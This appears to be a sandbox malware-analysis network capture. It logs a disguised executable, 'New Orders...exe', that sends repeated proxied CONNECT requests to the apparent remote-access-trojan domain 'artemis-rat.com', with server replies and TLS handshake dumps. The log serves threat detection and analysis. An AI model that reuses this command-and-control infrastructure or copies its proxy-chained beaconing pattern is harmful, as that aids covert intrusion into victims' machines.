                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        562192.168.2.951667159.65.77.16885857672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.110076904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.282030106 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        563192.168.2.951600159.223.166.2150787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.110917091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.632468939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.476541042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.961280107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.668118954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.380058050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.164132118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.461386919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.070012093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        564192.168.2.951488116.106.105.5510807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.112957001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        565192.168.2.951707104.21.66.184807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.113325119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.268789053 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        566192.168.2.951466114.255.132.6031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.114486933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.817614079 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        567192.168.2.951710185.162.228.48807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.114996910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.269690990 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        568192.168.2.951450103.190.54.14180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.115909100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        569192.168.2.95155794.131.107.4510807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.116300106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        570192.168.2.95156772.210.221.19741457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.116375923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        571192.168.2.95155558.75.126.23541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.118963957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        572192.168.2.950163184.170.249.6541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.122936010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        573192.168.2.951969200.111.182.64437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.127829075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        574192.168.2.951972200.111.182.64437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.128705978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        575192.168.2.951976200.111.182.64437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.130601883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        576192.168.2.951978200.111.182.64437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.132982969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        577192.168.2.95167334.83.143.631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.133066893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.733588934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.129271984 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        578192.168.2.95158054.248.238.110807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.133286953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.404448986 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:42.404755116 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 59 d0 c2 99 e9 42 b5 4e f8 6b 83 d9 24 d9 6a f9 ec b9 3d c4 4b d4 b3 32 6b 46 ea 18 a4 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e YBNk$j=K2kF*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:42.670607090 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 7c b0 ef 5a 12 87 8b 96 c2 46 ce 15 4f 93 47 32 5f 22 2f a3 33 24 de 30 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9|ZFOG2_"/3$0DOWNGRD0000*H010Uartemis-rat.com0240311151251Z260311151251Z010Uartemis-rat.com0"0*H0c XY
                                                                                        Mar 11, 2024 16:16:42.852623940 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 94 3a b4 70 6f 60 92 d2 78 d1 a5 49 44 4b 12 c7 c0 ae a0 2c 8f 72 f6 24 53 da 79 e6 01 19 5e 53 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 16 9f b7 09 0a e4 42 4e 8e 61 46 c7 81 8d 1c 4d 6b c6 a9 d1 05
                                                                                        Data Ascii: %! :po`xIDK,r$Sy^S(BNaFMk1z'h
                                                                                        Mar 11, 2024 16:16:43.117671967 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 ed 0c 42 29 04 57 ad 8a 6a 4a 91 32 61 16 05 85 54 09 23 fd a5 2e b1 d1 26 48 3d 86 a7 c9 1d 4d a5 0f 76 9e ed 5a 27 3e
                                                                                        Data Ascii: (B)WjJ2aT#.&H=MvZ'>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        579192.168.2.951711204.236.176.61807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.133893967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.319844007 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:42.320338011 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 59 8c 77 53 3d d8 d2 90 d9 26 6e 51 d3 16 55 0d b2 56 30 65 cd 18 2f 0a 2e ff bf e3 a0 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: lhe YwS=&nQUV0e/.*,+0/$#('=<5/artemis-rat.com#p:&~?4*.!"<J*V$k==OFY\)59wx+D
                                                                                        Mar 11, 2024 16:16:42.510271072 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 63 34 e6 6a e2 38 01 e8 61 4b 47 a8 55 22 2d d1 87 85 58 49 6d 4a 7c 41 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9c4j8aKGU"-XImJ|ADOWNGRD0000*H010Uartemis-rat.com0240311151535Z260311151535Z010Uartemis-rat.com0"0*H0Ob-F>Ce2
                                                                                        Mar 11, 2024 16:16:42.511925936 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 6c 50 6e 75 71 72 da c0 0b fe e2 ce 52 c2 b1 14 cf b7 0d 32 34 5b b2 be f1 b9 7d 55 a4 44 fb 50 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 88 51 e7 64 fe 31 5b 87 6f af 71 56 2f 30 07 32 34 2d 8d e1 c4
                                                                                        Data Ascii: %! lPnuqrR24[}UDP(Qd1[oqV/024-P,
                                                                                        Mar 11, 2024 16:16:42.684766054 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 04 a6 44 9d 0b fd 5f 00 68 c6 79 b0 d8 26 2a c7 20 ca fb 8e e2 cd a4 cb b9 ba 25 c5 23 d3 2e 49 a7 72 b0 78 ba d6 ac d6
                                                                                        Data Ascii: (D_hy&* %#.Irx


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        580192.168.2.95171523.94.214.890547672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.135689974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.316987038 CET34INHTTP/1.1 503 Service Unavailable


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        581192.168.2.95165923.161.96.132807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.148528099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.663717031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.476581097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.773488998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.476625919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.164120913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.773454905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.976478100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:08.164043903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        582192.168.2.95154880.78.64.7041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.153851032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        583192.168.2.95158468.1.210.16341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.154721022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        584192.168.2.951582174.64.199.7941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.154809952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
